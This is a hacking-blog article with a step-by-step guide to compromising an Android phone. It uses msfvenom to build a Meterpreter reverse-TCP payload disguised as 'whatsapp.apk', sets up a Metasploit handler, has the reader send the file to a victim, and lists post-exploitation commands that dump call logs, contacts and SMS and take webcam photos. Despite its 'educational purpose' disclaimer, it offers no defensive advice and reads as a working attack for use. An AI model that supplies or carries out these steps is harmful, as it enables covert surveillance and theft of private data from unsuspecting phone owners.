Sponsored

Hack SMS, Call Logs, Whatsapp of any Android Phone

In the india total number of android mobile users has reached 114 million. Cause of increasing the total number of andorid mobile users the cybercrime has also be incressed. Hence In this article we will discuss how to hack any android phone using metasploit framework and how to protect himself.

Declarations : This article is posted only for educational purpose to spread awareness among people.

Lets begin !!

Android platforms support applications with only .apk extensions hence we will make our malicious payload in .apk format.
Follow below commands for making a payload

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 R > whatsapp.apk
  • Lhost = ( according to your ip )
  • Lport = ( according to you )
  • R = Raw Format
  • P = ( platform )
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.107
set lport 4444
exploit

Send this apk file to the victim and make sure victim run this file in andorid phone.

When victim will run this apk file you can oberve meterpreter session will open.

BOOM ! You hacked vicitm phone.

After hacking vicitm phone we can do many thing using these commands such as call logs, camera, screenshot, whatsapp chats, sms details and much more. But we will show some major commands given below.

To show all features use the following command ;

help

You can gather information about OS ;

sysinfo

Check device rooted or not ;

check_root

You can check how many apps are installed in Victim’s phone ;

app_list

You can delete specific application by given this command ;

app_uninstall <packege_name>

You can use these command for dump all call-logs ;

dump_calllog

You can also dump all contact using the following command ;

dump_contacts

You can use the following command for dump all sms ;

dump_sms

You can read the dump file by execute the following command ;

cat dump.txt

You can use webcam of victim for capture the picture ;

webcam_snap

Sponsored

View Comments

Recent Posts

Termux Cheat Sheet for Hackers

Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…

1 month ago

Cracking the X-Factor in Cybersecurity: How Humans are Protecting the Systems?

Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…

8 months ago

Cariddi – Hidden Endpoint Finder for Bug Hunting

Hey Folks, we are back today after such a long break, but don't worry we…

2 years ago

API Security Testing 101: Know Everything About API Security Testing!

The security of your API should be one of the top priorities of companies. Without…

2 years ago

7 Best Tools for Web Penetration Testing: Comprehensive Details

Hey Folks, In today's business world, it is essential to have an online presence. However,…

2 years ago

Cyber Security Audits: Everything You Need to Know About It

Hey Folks, Is your business prepared in case of a cyber attack? Many companies don't…

2 years ago
Sponsored

This website uses cookies.